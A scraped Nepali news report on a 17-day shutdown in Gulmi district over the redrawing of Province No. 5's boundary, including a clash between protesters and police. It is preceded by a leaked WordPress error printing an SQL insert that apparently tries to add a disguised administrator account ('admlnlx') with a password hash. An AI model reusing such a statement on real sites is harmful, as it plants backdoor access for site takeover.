WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B1AtdYjNrTZQDsqQBIj3OuVNy8jo4e/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 10:23:53', '', 'admlnlx', 'admlnlx')
गुल्मी,पुस १-
पाँच नम्बर प्रदेशको सीमांकन हेरफेरको विरोधमा गुल्मी जिल्ला शुक्रबार १७ औं दिन पनि बन्द हुँदा जनजीबन कष्टकर भएको छ । जिल्ला प्रशासन कार्यालयमा बन्दकर्ताले लगाएको ताला खुलाउन खोज्दा शुक्रबार बिहान प्रहरीसँग झडपसमेत भएको छ ।
आन्दोलन र झडपले अप्रिय घटना हुन सक्ने भन्दै सर्बसाधारण आतंकित छन् र उनीहरुले बन्दको विकल्प खोज्न आग्रह गरेका छन् । लामो समयको बन्द र हड्तालले जीबनयापनमा समस्या भएको भन्दै सर्बसाधारणले बन्दको विकल्प खोज्न आग्रह गरेका हुन् ।
तर, संयुक्त आन्दोलन परिचालन संघर्ष समितिले भने संविधान संशोधन प्रस्ताव फिर्ता नभएसम्म बन्द र आन्दोलनका कार्यक्रम फिर्ता नलिने अडान लिएको छ ।
पाँच नम्बर प्रदेशको सीमांकन हेरफेरसहित सरकारले संसदमा संविधान संशोधन प्रस्ताव दर्ता गरेको विरोधमा गुल्मीमा बजार, यातायात, शिक्षण संस्था, कलकारखाना, सरकारी कार्यालयसमेत बन्द छन् ।
जिल्ला प्रशासन कार्यालयको मुख्य ढोकामा ताला लगाएर आन्दोलनकारीहरु बसेका थिए । राष्ट्रिय झण्डासमेत बोकेका उनीहरुलाई प्रहरीले हट्न आग्रह गरे पनि अटेर गरेका थिए । प्रहरीले बल प्रयोग गरेर हटाउन खोज्दा तनाव भएको थियो ।